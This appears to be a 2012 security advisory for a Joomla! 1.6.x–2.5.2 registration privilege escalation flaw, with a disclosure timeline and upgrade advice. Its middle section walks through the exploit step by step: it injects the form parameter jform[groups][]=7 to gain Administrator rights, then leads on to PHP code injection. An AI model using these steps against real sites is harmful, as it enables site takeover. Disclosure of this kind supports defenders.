http://www.wooyun.org/bugs/wooyun-2010-05526
Joomla! 1.6.x/1.7.x/2.5.0-2.5.2 suffers from a privilege escalation vulnerability that allows users to be registered into any group not having 'core.admin' privileges.
In order to be exploited, an attacker must visit index.php?option=com_users&view=registration and start creating a new user. During the initial creation, the attacker must cause the registration to fail by either NOT using the same password in both password fields or by purposefully failing the captcha (in 2.5.x). Before submitting the form, the attacker can use Firebug/Tamper Data to add the following parameter to the form data (assuming the site still has the default user groups enabled):
- Firebug: <input name="jform[groups][]" value="7" />
- Tamper Data: jform[groups][]=7
The form should reload, complaining that the passwords didn't match. This causes the group data to be stored into the session as form data. Once this is complete, giving valid values for the password fields and re-adding the parameter from before will cause the newly registered user to be assigned to the "Administrator" group because the user registration model reassigns the user to any group found to already exist in the session form data (but NOT to the groups directly given in the request).
After activating the account, the attacker will have a valid account with permissions to log in to the administrator/ interface, edit one of the templates, and inject php code (assuming the stock permissions/user groups are still in effect). Joomla! versions 1.6.x and 1.7.x also allow users in the "Administrator" group to install extensions, thus opening another avenue for code injection.
Joomla! versions 1.0.x, 1.5.x, and 2.5.3+ are not vulnerable. No patch has been issued for 1.6.x or 1.7.x and users of these versions are strongly urged to upgrade to 2.5.3 immediately.
Timeline
- Vendor Notified: 11 March 2012
- Vendor Response: 11 March 2012
- Update Available: 15 March 2012
- Disclosure: 15 March 2012
